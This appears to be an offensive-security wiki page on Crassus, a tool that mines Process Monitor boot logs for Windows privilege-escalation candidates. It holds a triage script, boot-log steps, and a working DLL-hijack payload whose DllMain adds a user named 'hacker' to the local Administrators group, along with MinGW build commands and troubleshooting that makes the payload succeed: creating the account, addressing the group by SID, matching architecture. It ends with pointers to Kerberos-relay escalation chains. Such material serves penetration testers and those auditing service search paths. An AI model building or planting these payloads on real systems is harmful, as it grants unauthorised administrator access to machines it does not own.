Crassus
Crassus is both a discovery tool and an enabler for exploitation:
- It parses a Process Monitor boot log and reports LPE candidates (writable directories on the service search path, missing DLLs referenced by services or scheduled tasks, and binaries that load from user-controlled locations).
- For each candidate it suggests how to weaponise it (typically a DLL planted in a writable directory that gets loaded by a privileged process at boot or service start).
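The triage Crassus performs can be reproduced in miniature to understand what a candidate is. The following is an added example, not Crassus's own code: it groups the CreateFile probes the Windows loader makes while searching for a DLL, per process and DLL name, and flags searches in which a service account probed a directory a low-privileged user can write to, either before it found the real DLL (search-order hijack) or without ever finding it (missing DLL). It runs over a constructed ProcMon CSV export (File > Save > CSV with the optional "User" column enabled) and takes the list of writable directories as input, as you would collect it with icacls or accesschk, instead of checking ACLs itself.

```python
"""Crassus-style triage of a Process Monitor CSV export (added example).

Groups the CreateFile probes of the loader's DLL search per (PID, DLL name),
keeps the directories it tried before (or without ever) finding the DLL, and
reports the ones a low-privileged user can write to when the loading process
runs as a service account.
"""
import csv
import io
import ntpath

# Service accounts whose DLL loads are worth hijacking (lower-cased for lookups).
PRIVILEGED_USERS = {
    r"nt authority\system",
    r"nt authority\local service",
    r"nt authority\network service",
}

# CONSTRUCTED sample in the shape of ProcMon's CSV export with the "User"
# column enabled. Not a real capture; paths and names are made up.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail","User"
"6:01:02.1234567 AM","svchost.exe","1234","CreateFile","C:\Program Files\Acme\Agent\acmehelper.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:02.1234570 AM","svchost.exe","1234","CreateFile","C:\Windows\System32\acmehelper.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:02.1234573 AM","svchost.exe","1234","CreateFile","C:\Windows\System\acmehelper.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:02.1234576 AM","svchost.exe","1234","CreateFile","C:\Windows\acmehelper.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:02.1234579 AM","svchost.exe","1234","CreateFile","C:\Python27\acmehelper.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:02.2000000 AM","svchost.exe","1234","Load Image","C:\Windows\System32\kernel32.dll","SUCCESS","Image Base: 0x7ff9c0000000","NT AUTHORITY\SYSTEM"
"6:01:03.0000000 AM","explorer.exe","4321","CreateFile","C:\Python27\foo.dll","NAME NOT FOUND","Desired Access: Read Attributes","CORP\bob"
"6:01:04.0000000 AM","BetaSvc.exe","2222","CreateFile","C:\Program Files\Beta\BetaSvc\version.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"6:01:04.0000003 AM","BetaSvc.exe","2222","CreateFile","C:\Windows\System32\version.dll","SUCCESS","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
'''

# CONSTRUCTED: directories a low-privileged user can write to on the target
# (collected separately, e.g. with icacls or accesschk; not computed here).
WRITABLE_DIRS = [r"C:\Python27", r"C:\Program Files\Beta\BetaSvc"]


def _norm(path):
    """Case-insensitive, normalized Windows path for set membership tests."""
    return ntpath.normpath(path).lower()


def dll_search_sequences(rows):
    """Group CreateFile probes by (PID, DLL name) in first-seen order.

    Each sequence records the directories that returned NAME/PATH NOT FOUND in
    the order the loader tried them, and the path where the DLL was finally
    found (None if the search never succeeded).
    """
    sequences = {}
    for row in rows:
        path = row["Path"]
        if row["Operation"] != "CreateFile" or not path.lower().endswith(".dll"):
            continue
        key = (row["PID"], ntpath.basename(path).lower())
        seq = sequences.setdefault(key, {
            "process": row["Process Name"], "pid": row["PID"],
            "user": row.get("User", ""), "dll": key[1],
            "probes": [], "found": None,
        })
        if seq["found"] is not None:
            continue  # later opens of an already-resolved DLL are not search probes
        if row["Result"] in ("NAME NOT FOUND", "PATH NOT FOUND"):
            seq["probes"].append(ntpath.dirname(path))
        elif row["Result"] == "SUCCESS":
            seq["found"] = path
    return list(sequences.values())


def find_candidates(csv_text, writable_dirs):
    """Return hijack candidates: privileged DLL searches that touched a writable dir."""
    writable = {_norm(d) for d in writable_dirs}
    candidates = []
    for seq in dll_search_sequences(csv.DictReader(io.StringIO(csv_text))):
        if seq["user"].lower() not in PRIVILEGED_USERS:
            continue  # a hijack in the user's own context is not an LPE
        hits = [d for d in seq["probes"] if _norm(d) in writable]
        if not hits:
            continue
        candidates.append({
            "process": seq["process"],
            "pid": seq["pid"],
            "dll": seq["dll"],
            # The first writable directory in search order is where a planted
            # DLL wins, even if the genuine DLL exists further down the path.
            "plant_in": hits[0],
            "missing": seq["found"] is None,
        })
    return candidates


if __name__ == "__main__":
    for c in find_candidates(SAMPLE_CSV, WRITABLE_DIRS):
        kind = "missing DLL" if c["missing"] else "search-order hijack"
        print(f'{c["process"]} (PID {c["pid"]}): plant {c["dll"]} in {c["plant_in"]} [{kind}]')
```

On the sample this reports two candidates: `acmehelper.dll`, which svchost.exe never finds and last looks for in the writable `C:\Python27` PATH entry, and `version.dll`, which BetaSvc.exe does find in System32 but only after probing its own writable application directory first. The explorer.exe probe in `C:\Python27` is dropped because it runs as the user, not as a service account.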
Collecting a boot log
- In ProcMon enable boot logging under Options > Enable Boot Logging.
- Reboot the machine and open as many programs as you like; don't forget to install tools from the Software Center. Make sure not to use your admin credentials when installing other software, otherwise the log captures what an administrator can do rather than what a low-privileged user can trigger.
- Reopen ProcMon and save the logfile to `C:\Bootlog.pml`.
- Run `Crassus.exe C:\Bootlog.pml` and check the reported LPE candidates. Repeat this step for each logfile if ProcMon produced more than one.
- The code samples in the `stubs` directory are mostly non-functional. Find a working code sample below.
- Compile the code sample.
Compile example from Linux
The following code sample adds the user `hacker` to the local Administrators group.
Known quirks (the usual reasons the payload runs but nothing happens):
- The user `hacker` doesn't exist. Either add `net user hacker <password> /add` to the payload before the `net localgroup` call (the payload runs with the privileges of the loading process, so it can create accounts) or substitute the low-privileged account you already control.
- The group `Administrators` doesn't exist on non-English Windows systems, where the built-in group name is localized. Address it by its well-known SID instead, e.g. `powershell -c "Add-LocalGroupMember -SID S-1-5-32-544 -Member hacker"`.
- The binary is compiled for the wrong architecture (32-bit vs 64-bit). A process only loads DLLs of its own bitness, so match the DLL to the loading process, not to the OS.
```cpp
#include <windows.h>
#include <cstdlib>   // system()

extern "C" {

// Entry point the loader calls once the privileged process maps the planted DLL.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    // Run the payload once, on process attach, not again for every new thread.
    // system() spawns a child process while the loader lock is held; that is
    // fine for a one-shot payload but do not do anything more elaborate here.
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Assumes the user "hacker" exists and the group is named
        // "administrators" (see the known quirks above).
        system("cmd.exe /c net localgroup administrators hacker /add");
    }
    return TRUE;
}

#ifdef ADD_EXPORTS
// Any exports the hijacked DLL must provide are declared in ubsec.def and
// linked in below; nothing is needed in the source itself.
#endif

}
```
The following commands compile `ubsec.dll` from `ubsec.cpp` via `ubsec.o`. `ubsec.def` is the export definition file (not shown here): if the loading binary links functions of the hijacked DLL statically, the .def must export those names, otherwise import resolution fails and `DllMain` never runs. Both variants write the same output files, so build one architecture at a time.
```bash
# 32-bit DLL
i686-w64-mingw32-g++ -c -o ubsec.o ubsec.cpp -D ADD_EXPORTS
i686-w64-mingw32-g++ -o ubsec.dll ubsec.o ubsec.def -s -shared -Wl,--subsystem,windows
# 64-bit DLL
x86_64-w64-mingw32-g++ -c -o ubsec.o ubsec.cpp -D ADD_EXPORTS
x86_64-w64-mingw32-g++ -o ubsec.dll ubsec.o ubsec.def -s -shared -Wl,--subsystem,windows
```
After placing the compiled DLL in the vulnerable location, make the target system load it (usually by rebooting the server or restarting the service).
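The wrong-architecture quirk is cheap to rule out before the reboot. The following added check (example code, not part of the build steps above or of Crassus) reads the `Machine` field of the COFF header of both the loading executable and the freshly built `ubsec.dll`, the same value `file` or `dumpbin /headers` prints, and also confirms the payload was actually linked as a DLL. The `fake_pe` helper builds a constructed minimal header so the check can be exercised offline; against a real target you pass the two file paths on the command line.

```python
"""Verify a planted DLL matches the bitness of the process that loads it (added example)."""
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000  # IMAGE_FILE_HEADER.Characteristics flag set on DLL images

MACHINE_NAMES = {
    IMAGE_FILE_MACHINE_I386: "x86 (32-bit)",
    IMAGE_FILE_MACHINE_AMD64: "x64 (64-bit)",
}


def coff_header(data):
    """Return (Machine, Characteristics) from a PE image's IMAGE_FILE_HEADER."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return machine, characteristics


def architecture_matches(loader_image, dll_image):
    """True when the payload is a DLL of the same machine type as the loading executable."""
    loader_machine, _ = coff_header(loader_image)
    dll_machine, dll_chars = coff_header(dll_image)
    if not dll_chars & IMAGE_FILE_DLL:
        raise ValueError("payload is not linked as a DLL (missing -shared?)")
    return loader_machine == dll_machine


def describe(image):
    """Human-readable summary such as 'DLL x64 (64-bit)'."""
    machine, chars = coff_header(image)
    kind = "DLL" if chars & IMAGE_FILE_DLL else "EXE"
    return f"{kind} {MACHINE_NAMES.get(machine, hex(machine))}"


def fake_pe(machine, is_dll):
    """CONSTRUCTED: just enough header for the checks above; not a loadable image."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    chars = 0x0022 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, chars)
    return dos + b"\0" * (e_lfanew - len(dos)) + b"PE\0\0" + coff


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: pecheck.py <loading .exe> <payload .dll>")
    with open(sys.argv[1], "rb") as f:
        loader = f.read()
    with open(sys.argv[2], "rb") as f:
        dll = f.read()
    verdict = "OK" if architecture_matches(loader, dll) else "MISMATCH"
    print(f"{describe(loader)} <- {describe(dll)}: {verdict}")
```

Run it against the service binary Crassus named as the loader, not against the OS: a 32-bit service on 64-bit Windows still needs the `i686-w64-mingw32-g++` build.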
Local privilege escalation via Kerberos relaying
For the no-fix Kerberos-relay LPE chain (KrbRelay + RBCD or shadow credentials + SCM UAC bypass), see LPE via NTLM and Kerberos relaying. For automated PrivescCheck-based discovery, see PrivescCheck.